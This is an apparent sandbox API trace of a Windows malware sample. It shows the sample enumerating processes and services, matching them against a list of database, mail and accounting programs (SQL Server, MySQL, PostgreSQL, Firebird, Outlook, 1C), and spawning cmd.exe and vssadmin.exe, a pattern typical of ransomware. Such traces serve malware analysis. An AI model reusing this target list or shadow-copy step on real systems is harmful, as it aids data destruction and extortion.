	[0139.191] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0139.192] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0139.192] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0139.192] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0139.192] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0139.192] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0139.192] lstrlenW (lpString="lsm.exe") returned 7
	[0139.192] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0139.192] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0139.192] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0139.192] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0139.192] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0139.192] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0139.192] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0139.192] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0139.192] lstrlenW (lpString="svchost.exe") returned 11
	[0139.192] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0139.192] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0139.193] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0139.193] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0139.193] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0139.193] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0139.193] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0139.193] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0139.193] lstrlenW (lpString="svchost.exe") returned 11
	[0139.193] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0139.193] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0139.193] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0139.193] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0139.193] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0139.193] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0139.193] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0139.193] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0139.193] lstrlenW (lpString="svchost.exe") returned 11
	[0139.193] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0139.194] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0139.194] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0139.194] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0139.194] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0139.194] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0139.194] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0139.194] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0139.194] lstrlenW (lpString="svchost.exe") returned 11
	[0139.194] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0139.194] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0139.194] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0139.194] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0139.194] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0139.194] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0139.194] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0139.194] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0139.194] lstrlenW (lpString="svchost.exe") returned 11
	[0139.195] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0139.195] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0139.195] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0139.195] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0139.195] lstrlenW (lpString="audiodg.exe") returned 11
	[0139.195] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0139.195] lstrlenW (lpString="svchost.exe") returned 11
	[0139.195] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0139.196] lstrlenW (lpString="svchost.exe") returned 11
	[0139.196] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0139.196] lstrlenW (lpString="spoolsv.exe") returned 11
	[0139.196] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0139.196] lstrlenW (lpString="svchost.exe") returned 11
	[0139.196] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0139.197] lstrlenW (lpString="taskhost.exe") returned 12
	[0139.197] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0139.197] lstrlenW (lpString="userinit.exe") returned 12
	[0139.197] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0139.197] lstrlenW (lpString="dwm.exe") returned 7
	[0139.197] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0139.197] lstrlenW (lpString="explorer.exe") returned 12
	[0139.198] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0139.198] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0139.198] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0139.198] lstrlenW (lpString="reader_sl.exe") returned 13
	[0139.198] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0139.198] lstrlenW (lpString="cmd.exe") returned 7
	[0139.198] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0139.199] lstrlenW (lpString="conhost.exe") returned 11
	[0139.199] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x730, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0139.199] lstrlenW (lpString="vssadmin.exe") returned 12
	[0139.199] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x730, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0
	[0139.199] CloseHandle (hObject=0x384) returned 1
	[0139.199] Sleep (dwMilliseconds=0x1f4) 
	[0139.717] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616c60
	[0139.718] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0139.718] GetLastError () returned 0xea
	[0139.718] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb612378
	[0139.718] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0139.719] CloseServiceHandle (hSCObject=0xb616c60) returned 1
	[0139.719] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0139.719] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0139.719] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0139.719] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0139.719] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0139.719] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0139.719] lstrlenW (lpString="AudioSrv") returned 8
	[0139.719] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0139.719] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0139.719] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0139.719] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0139.719] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0139.719] lstrlenW (lpString="BFE") returned 3
	[0139.719] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0139.719] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0139.719] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0139.719] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0139.719] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0139.719] lstrlenW (lpString="CryptSvc") returned 8
	[0139.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0139.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0139.720] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0139.720] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0139.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0139.720] lstrlenW (lpString="CscService") returned 10
	[0139.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0139.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0139.720] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0139.720] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0139.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0139.720] lstrlenW (lpString="DcomLaunch") returned 10
	[0139.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0139.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0139.720] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0139.720] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0139.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0139.720] lstrlenW (lpString="Dhcp") returned 4
	[0139.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0139.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0139.720] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0139.720] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0139.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0139.720] lstrlenW (lpString="Dnscache") returned 8
	[0139.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0139.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0139.720] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0139.720] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0139.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0139.720] lstrlenW (lpString="DPS") returned 3
	[0139.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0139.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0139.720] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0139.720] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0139.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0139.721] lstrlenW (lpString="eventlog") returned 8
	[0139.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0139.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0139.721] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0139.721] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0139.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0139.721] lstrlenW (lpString="EventSystem") returned 11
	[0139.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0139.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0139.721] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0139.721] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0139.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0139.721] lstrlenW (lpString="gpsvc") returned 5
	[0139.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0139.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0139.721] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0139.721] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0139.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0139.721] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0139.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0139.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0139.721] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0139.721] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0139.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0139.721] lstrlenW (lpString="lmhosts") returned 7
	[0139.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0139.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0139.721] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0139.721] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0139.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0139.721] lstrlenW (lpString="MMCSS") returned 5
	[0139.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0139.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0139.722] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0139.722] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0139.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0139.722] lstrlenW (lpString="MpsSvc") returned 6
	[0139.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0139.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0139.722] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0139.722] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0139.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0139.722] lstrlenW (lpString="NlaSvc") returned 6
	[0139.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0139.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0139.722] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0139.722] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0139.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0139.722] lstrlenW (lpString="nsi") returned 3
	[0139.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0139.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0139.722] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0139.722] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0139.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0139.722] lstrlenW (lpString="PcaSvc") returned 6
	[0139.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0139.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0139.722] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0139.722] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0139.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0139.722] lstrlenW (lpString="PlugPlay") returned 8
	[0139.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0139.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0139.722] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0139.723] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0139.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0139.723] lstrlenW (lpString="Power") returned 5
	[0139.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0139.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0139.723] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0139.723] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0139.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0139.723] lstrlenW (lpString="ProfSvc") returned 7
	[0139.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0139.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0139.723] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0139.723] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0139.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0139.723] lstrlenW (lpString="RpcEptMapper") returned 12
	[0139.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0139.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0139.723] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0139.723] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0139.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0139.723] lstrlenW (lpString="RpcSs") returned 5
	[0139.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0139.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0139.723] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0139.723] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0139.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0139.723] lstrlenW (lpString="SamSs") returned 5
	[0139.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0139.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0139.723] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0139.723] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0139.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0139.723] lstrlenW (lpString="Schedule") returned 8
	[0139.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0139.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0139.724] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0139.724] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0139.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0139.724] lstrlenW (lpString="SENS") returned 4
	[0139.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0139.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0139.724] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0139.724] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0139.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0139.724] lstrlenW (lpString="ShellHWDetection") returned 16
	[0139.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0139.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0139.724] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0139.724] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0139.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0139.724] lstrlenW (lpString="Spooler") returned 7
	[0139.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0139.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0139.724] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0139.724] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0139.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0139.724] lstrlenW (lpString="Themes") returned 6
